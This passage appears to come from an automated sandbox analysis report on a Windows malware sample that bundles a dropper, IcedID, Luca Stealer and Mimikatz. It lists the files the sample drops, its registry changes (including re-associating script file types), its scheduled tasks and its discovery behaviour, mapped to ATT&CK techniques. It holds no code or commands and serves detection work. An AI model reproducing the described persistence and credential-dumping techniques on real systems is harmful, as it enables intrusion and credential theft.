File created	C:\Windows\InfusedAppe\UnattendGC\specials\ssleay32.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\svschost.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\Corporate\mimidrv.sys	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File opened for modification	C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File opened for modification	C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\libeay32.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\svschost.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\Corporate\scvhost.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\tibe-2.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\cnli-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\posh-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\ucl.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\Corporate\mimilib.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\Priess\scan.bat	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\svschost.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\svschost.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\Corporate\vfshost.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\tucl-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\xdvl-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\libxml2.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\trfo-2.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\spoolsrv.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\coli-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\tibe-2.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\spoolsrv.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\zlib1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\trch-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\svschost.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\libeay32.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File opened for modification	C:\Windows\spoolsrv.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\exma-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\trfo-2.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\xdvl-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\AppCapture_x64.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\crli-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\libxml2.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File opened for modification	C:\Windows\InfusedAppe\Priess\ip.txt	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2488	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ssssgc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleCdoeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wimnat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	ssssgc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ssssgc.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3061DCD8-72EE-4B36-B7E8-946967CAB477}\fe-51-5f-3b-0a-20	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3061DCD8-72EE-4B36-B7E8-946967CAB477}\WpadDecisionReason = "1"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-51-5f-3b-0a-20\WpadDecision = "0"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ssssgc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-51-5f-3b-0a-20\WpadDecisionReason = "1"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum	ssssgc.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0075000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3061DCD8-72EE-4B36-B7E8-946967CAB477}\WpadNetworkName = "Network 3"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	ssssgc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7"	ssssgc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3061DCD8-72EE-4B36-B7E8-946967CAB477}	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3061DCD8-72EE-4B36-B7E8-946967CAB477}\WpadDecision = "0"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-51-5f-3b-0a-20	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-51-5f-3b-0a-20\WpadDecisionTime = d0cf61473040db01	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	dumpcore.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Modifies registry class 6 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2700	schtasks.exe
2764	schtasks.exe
1108	schtasks.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
832	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
4808	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
580	vfshost.exe
580	vfshost.exe
580	vfshost.exe
580	vfshost.exe
580	vfshost.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
